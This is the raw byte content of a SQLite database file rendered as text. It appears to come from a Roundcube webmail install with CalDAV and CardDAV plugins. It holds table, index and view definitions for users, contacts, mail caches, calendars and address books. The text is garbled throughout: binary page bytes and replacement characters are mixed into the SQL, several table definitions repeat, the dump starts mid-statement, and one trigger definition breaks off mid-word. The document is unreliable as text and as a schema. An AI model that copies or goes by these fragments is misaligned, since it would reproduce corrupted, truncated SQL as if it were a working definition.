NULL PRIMARY KEY, user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, changed datetime NOT NULL default '0000-00-00 00:00:00', del tinyint NOT NULL default '0', name varchar(128) NOT NULL default '' )b�J3�indexix_contacts_user_idcontactsCREATE INDEX ix_contacts_user_id ON contacts(user_id, del)��I�atablecontactscontactsYCREATE TABLE contacts ( contact_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, changed datetime NOT NULL default '0000-00-00 00:00:00', del tinyint NOT NULL default '0', name varchar(128) NOT NULL default '', email text NOT NULL default '', firstname varchar(128) NOT NULL default '', surname varchar(128) NOT NULL default '', vcard text NOT NULL default '', words text NOT NULL default '' )f�H/�indexix_users_usernameusersCREATE UNIQUE INDEX ix_users_username ON users(username, mail_host)��G�tableusersusers CREATE TABLE users ( user_id integer NOT NULL PRIMARY KEY, username varchar(128) NOT NULL default '', mail_host varchar(128) NOT NULL default '', created datetime NOT NULL default '0000-00-00 00:00:00', last_login datetime DEFAULT NULL, failed_login datetime DEFAULT NULL, failed_login_counter integer DEFAULT NULL, language varchar(16), preferences text DEFAULT NULL ) C�W1 indexsqlite_autoindex_carddav_group_user_1carddav_group_userR � � �[�\�4��� c %�]�L � � � ��;;�mviewcaldav_calendars_mergedcaldav_calendars_mergedCREATE VIEW caldav_calendars_merged AS SELECT c.calendar_id, c.user_id, c.name, c.color, c.showalarms, c.driver, cc.readonly, cc.caldav_url, cc.caldav_tag, cc.caldav_user, cc.caldav_pass, cc.caldav_oauth_provider, cc.caldav_last_change, c.calendar_id AS id FROM calendars as c JOIN caldav_calendars as cc ON c.calendar_id = cc.calendar_id WHERE c.driver='caldav'�(�c%%�tablecache_threadcache_thread CREATE TABLE cache_thread ( user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, mailbox varchar(255) NOT NULL, expires datetime DEFAULT NULL, data text NOT NULL, PRIMARY KEY (user_id, mailbox) )v�h?)�indexix_cache_messages_expirescache_messages$CREATE INDEX ix_cache_messages_expires ON cache_messages (expires)�u�f))�%tablecache_messagescache_messagesCREATE TABLE cache_messages ( user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, mailbox varchar(255) NOT NULL, uid integer NOT NULL, expires datetime DEFAULT NULL, data text NOT NULL, flags integer NOT NULL DEFAULT '0', PRIMARY KEY (user_id, mailbox, uid) );�gO) indexsqlite_autoindex_cache_messages_1cache_messages#n�e;%� indexix_cache_thread_expirescache_thread"CREATE INDEX ix_cache_thread_expires ON cache_thread (expires)7�dK% indexsqlite_autoindex_cache_thread_1cache_thread! �G'�)triggerUpdateLastTimeForCalDAVEventscaldav_eventsCREATE TRIGGER UpdateLastTimeForCalDAVEvents AFTER UPDATE ON caldav_eve�x�}55�tablecarddav_addressbookscarddav_addressbooks;CREATE TABLE "carddav_addressbooks" ( id integer NOT NULL PRIMARY KEY, name TEXT NOT NULL, username TEXT NOT NULL, password TEXT NOT NULL, url TEXT NOT NULL, active TINYINT UNSIGNED NOT NULL DEFAULT 1, user_id integer NOT NULL, last_updated BIGINT NOT NULL DEFAULT 0, refresh_time INT NOT NULL DEFAULT 3600, sync_token TEXT NOT NULL DEFAULT '', presetname TEXT, use_categories TINYINT NOT NULL DEFAULT 0, FOREIGN KEY(user_id) REFERENCES users(user_id) ON DELETE CASCADE ON UPDATE CASCADE )C�|W1 indexsqlite_autoindex_carddav_migrations_1carddav_migrations:�[�{11�atablecarddav_migrationscarddav_migrations9CREATE TABLE "carddav_migrations" ( id integer NOT NULL PRIMARY KEY, filename TEXT NOT NULL, processed_at TIME NOT NULL DEFAULT CURRENT_TIMESTAMP, UNIQUE(filename) )� �yK1�%indexcarddav_group_user_group_id_idxcarddav_group_user6CREATE INDEX carddav_group_user_group_id_idx ON carddav_group_user(group_id)��xO1�-indexcarddav_group_user_contact_id_idxcarddav_group_user5CREATE INDEX carddav_group_user_contact_id_idx ON carddav_group_user(contact_id)z�wC)�indexcarddav_groups_abook_id_idxcarddav_groups4CREATE INDEX carddav_groups_abook_id_idx ON carddav_groups(abook_id)��vI/�!indexcarddav_xsubtypes_abook_id_idxcarddav_xsubtypes3CREATE INDEX carddav_xsubtypes_abook_id_idx ON carddav_xsubtypes(abook_id);�uO) indexsqlite_autoindex_carddav_groups_2carddav_groups2;�tO) indexsqlite_autoindex_carddav_groups_1carddav_groups1��s))�atablecarddav_groupscarddav_groups0CREATE TABLE "carddav_groups" ( id integer NOT NULL PRIMARY KEY, abook_id integer NOT NULL, name VARCHAR(255) NOT NULL, vcard TEXT, etag VARCHAR(255), uri VARCHAR(255), cuid VARCHAR(255), UNIQUE(uri,abook_id), UNIQUE(cuid,abook_id), FOREIGN KEY(abook_id) REFERENCES carddav_addressbooks(id) ON DELETE CASCADE ON UPDATE CASCADE )^�r/}indexcalendar_name_idxcalendars,CREATE UNIQUE INDEX calendar_name_idx ON calendars(name)j�b9#�indexix_cache_index_expirescache_indexCREATE INDEX ix_cache_index_expires ON cache_index (expires)5�aI# indexsqlite_autoindex_cache_index_1cache_index � ���� 32024-06-29 08:26:2532022-03-19 04:29:0532019-05-21 06:28:263 2019-05-21 06:26:04 = K ���Jv�e �� � K K K K ( �x�}55�tablecarddav_addressbookscarddav_addressbooks;CREATE TABLE "carddav_addressbooks" ( id integer NOT NULL PRIMARY KEY, name TEXT NOT NULL, username TEXT NOT NULL, password TEXT NOT NULL, url TEXT NOT NULL, active TINYINT UNSIGNED NOT NULL DEFAULT 1, user_id integer NOT NULL, last_updated BIGINT NOT NULL DEFAULT 0, refresh_time INT NOT NULL DEFAULT 3600, sync_token TEXT NOT NULL DEFAULT '', presetname TEXT, use_categories TINYINT NOT NULL DEFAULT 0, FOREIGN KEY(user_id) REFERENCES users(user_id) ON DELETE CASCADE ON UPDATE CASCADE )�[�{11�atablecarddav_migrationscarddav_migrations9CREATE TABLE "carddav_migrations" ( id integer NOT NULL PRIMARY KEY, filename TEXT NOT NULL, processed_at TIME NOT NULL DEFAULT CURRENT_TIMESTAMP, UNIQUE(filename) )��s))�atablecarddav_groupscarddav_groups0CREATE TABLE "carddav_groups" ( id integer NOT NULL PRIMARY KEY, abook_id integer NOT NULL, name VARCHAR(255) NOT NULL, vcard TEXT, etag VARCHAR(255), uri VARCHAR(255), cuid VARCHAR(255), UNIQUE(uri,abook_id), UNIQUE(cuid,abook_id), FOREIGN KEY(abook_id) REFERENCES carddav_addressbooks(id) ON DELETE CASCADE ON UPDATE CASCADE )'